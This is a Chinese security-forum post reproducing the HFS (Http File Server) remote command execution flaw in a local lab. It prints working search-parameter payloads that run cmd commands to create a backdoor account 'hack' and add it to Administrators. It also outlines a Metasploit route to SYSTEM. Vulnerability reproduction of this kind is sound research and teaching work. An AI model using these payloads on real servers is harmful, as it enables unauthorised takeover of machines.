首页
社区
课程
招聘
[原创]HFS远程命令执行漏洞复现
发表于: 2020-5-28 14:46 679

[原创]HFS远程命令执行漏洞复现

2020-5-28 14:46
679

漏洞程序下载地址:Http File Server

 

这里说一下,在Windows server 2003中复现时,我直接使用Administrator用户登录,然后复现,未出现权限问题。再Windows 10中尝试复现时发现权限不足,需要以管理员权限执行漏洞程序。

 

运行程序截图如下
在这里插入图片描述
尝试访问该软件提供的web服务
在这里插入图片描述
web服务是这个样子的,这个web服务的搜索处存在漏洞

一、手工利用

payload如下

1
2
http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.}
http://127.0.0.1/?search==%00{.exec|cmd /c 此处替换为dos命令.}

完整利用过程如下
使用如下payload添加一个管理员账户

1
http://127.0.0.1/?search==%00{.exec|cmd /c net user hack 123 /add.}

添加用户:hack
密码:123
在这里插入图片描述
将用户hack添加到Administrators组。

1
http://127.0.0.1/?search==%00{.exec|cmd /c net localgroup Administrators hack /add.}

在这里插入图片描述
开启3389远程端口
在这里插入图片描述
使用远程连接工具连接,连接成功。
在这里插入图片描述

二、使用msf利用

启动Metasploit,搜索hfs漏洞利用模块
在这里插入图片描述
加载模块,并设置目标IP
在这里插入图片描述
设置payload,以及本机IP
在这里插入图片描述
开始执行
在这里插入图片描述
成功获得system权限
在这里插入图片描述
CSDN首发:https://blog.csdn.net/qin9800/article/details/106403462


[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课

最后于 2021-8-5 17:00 被夏了茶糜.编辑 ,原因: 添加附件
上传的附件:
收藏
免费 1
支持
分享
最新回复 (0)
游客
登录 | 注册 方可回帖
返回
//